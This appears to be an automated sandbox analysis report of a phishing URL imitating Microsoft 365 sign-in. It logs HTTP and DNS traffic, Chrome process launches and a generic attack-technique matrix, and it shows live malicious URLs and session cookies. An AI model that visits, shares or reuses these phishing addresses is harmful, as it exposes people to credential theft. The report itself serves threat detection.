Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://cesinc365.xemitronax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ff714c8fb27c325&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8ff714c8fb27c325&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cesinc365.xemitronax.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cesinc365.xemitronax.ru/9FAvn/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlExeTdtZkpYM0QwQitySVJNVDEvcXc9PSIsInZhbHVlIjoiR3U1UHBJS00zOVNycThlM2hIUzJUZ05HUCtJUWUraGdwRzFNYTU4c3M3Uk1mWnRJbVNDT044Vnp1MHVtcHp4VDR2VG1qU21meVliYXh5ZkFQckZkZ2U5ZmlmVFp0ZE9scVJ1VHRibnYxSHZ2QWRGajBmTC9LK3lNQ0E3SFlvdEwiLCJtYWMiOiJjZDZjMWY1MjA1MjZjNzg4ZmIyZTk3MDg0YzkyZTY3NjVlOTBiNDBmMTYzZGIzNzQ1N2VlMGI5NGRiMTE1ZjNkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkpmOEZrY3BJSVZTZ0xjUTZsSExaS2c9PSIsInZhbHVlIjoiTDFKN2V0K1ovNCs3NlN1SHFQN3VwakEyRkdSejdUdjhwSGFGR2c4c3ZDU0wzMlVRaGtPMS9IWS9VamNRR2Q0VzJuaUptNURoM1Z0OVB1QUFEc1grQUNJdEw5MWY0OVFPWU9OUlpQdXU4UTF1TTdyRDlmdWRlekJBWldtZ01BL3ciLCJtYWMiOiJlYTBlYTExYTMzMzM5MzUxNTU4ZjNlYWYyYTAzZDU4YmZlZGZiMTAyZDczMzQ3NmRhYzUzMzkzNTQ5MWQwYWNhIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ff714c8fb27c325/1736453537880/TCoQzFc-1Z86YKl HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8ff714c8fb27c325/1736453537880/TCoQzFc-1Z86YKl HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8ff714c8fb27c325/1736453537883/03831841271b98307c37aaa89aea0ab835898c545ed3320b0501ee93361c0c92/7XzLK_UGDfcbQyz HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /929268867031708856czBhliCZLLQRDCGBQXJMWXIMWDZGWSFBAJAAWYI HTTP/1.1Host: jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://cesinc365.xemitronax.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://cesinc365.xemitronax.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /929268867031708856czBhliCZLLQRDCGBQXJMWXIMWDZGWSFBAJAAWYI HTTP/1.1Host: jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: cesinc365.xemitronax.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/2140440123:1736450218:Qkz8xK01k7_d2gYcFjCrxwUowfxFCy7ft3oS6awrjsg/8ff714c8fb27c325/sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.k HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3166sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: sTdnSaHhRiOYCdlUNJBeHl4xjfNSjuWryxpE02IyMzY-1736453536-1.1.1.1-toETkGxCtlpdHd.Hhj2xL6YIwSfxnhq5vsxZRCl6FqdupSx8Om5i5Z870y.q7X.ksec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/pzzoe/0x4AAAAAAA3bgXiDXCFJKrv3/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 20:12:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VsW10caaSEv3BXHBOFrlTf5Iwt5dV3lCAutlthbnB%2FGWPEtK2NTn334xBnsa9SiDQ%2F8nHl2H6nUU88IyM6YreVjQgCGAo2VhV0T%2BMdwBG0M2PNh1ebKbDtyRWny08w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=5095&min_rtt=5058&rtt_var=1446&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2288&delivery_rate=557447&cwnd=251&unsent_bytes=0&cid=e4c94c17b0f384fd&ts=197&x=0"CF-Cache-Status: HITAge: 5820Server: cloudflareCF-RAY: 8ff714d2fe7f425b-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1701&rtt_var=652&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1909&delivery_rate=1660034&cwnd=241&unsent_bytes=0&cid=061e7b9e37678433&ts=152&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 20:12:18 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: IY3Sf+55crH4PpPrVnpeYw==$71D75Av0Xzk55AmeX1glMg==Server: cloudflareCF-RAY: 8ff714d96d8c8c89-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 20:12:22 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 3RbBSgU7UnWZSmipOVB4CA==$WJBZVGu/hZMWAxkYdRIDrQ==Server: cloudflareCF-RAY: 8ff714f0d8ff72ab-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 09 Jan 2025 20:12:30 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 3lCJbGCn7yv+PJLTEqAITQ==$jQDH+06SOxiENo7/hiZVDQ==Server: cloudflareCF-RAY: 8ff715209a78c35f-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_71.2.dr, chromecache_79.2.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_71.2.dr, chromecache_79.2.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: classification engineClassification label: mal60.win@21/68@38/12
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2304,i,16959890076027813342,710148455855415502,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://cesinc365.xemitronax.ru/9FAvn/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2348 --field-trial-handle=2304,i,16959890076027813342,710148455855415502,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://cesinc365.xemitronax.ru/9FAvn/100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://cesinc365.xemitronax.ru/favicon.ico100%Avira URL Cloudphishing
https://jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru/929268867031708856czBhliCZLLQRDCGBQXJMWXIMWDZGWSFBAJAAWYI0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
cesinc365.xemitronax.ru
188.114.97.3
truetrue
    unknown
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru
      172.67.195.229
      truefalse
        unknown
        code.jquery.com
        151.101.130.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            s-part-0033.t-0009.t-msedge.net
            13.107.246.61
            truefalse
              high
              challenges.cloudflare.com
              104.18.95.41
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  sni1gl.wpc.omegacdn.net
                  152.199.21.175
                  truefalse
                    high
                    www.google.com
                    142.250.74.196
                    truefalse
                      high
                      www.office.com
                      unknown
                      unknownfalse
                        high
                        identity.nel.measure.office.net
                        unknown
                        unknownfalse
                          high
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            high
                            login.microsoftonline.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://cesinc365.xemitronax.ru/favicon.icofalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://a.nel.cloudflare.com/report/v4?s=VsW10caaSEv3BXHBOFrlTf5Iwt5dV3lCAutlthbnB%2FGWPEtK2NTn334xBnsa9SiDQ%2F8nHl2H6nUU88IyM6YreVjQgCGAo2VhV0T%2BMdwBG0M2PNh1ebKbDtyRWny08w%3D%3Dfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                  high
                                  https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                    high
                                    https://jkas2k7pqn0lq86hseh0rkrzcqgauwj21bi4kj4y8r6c1tblsmxgt5ffcd0e.sprocubseq.ru/929268867031708856czBhliCZLLQRDCGBQXJMWXIMWDZGWSFBAJAAWYIfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                      high
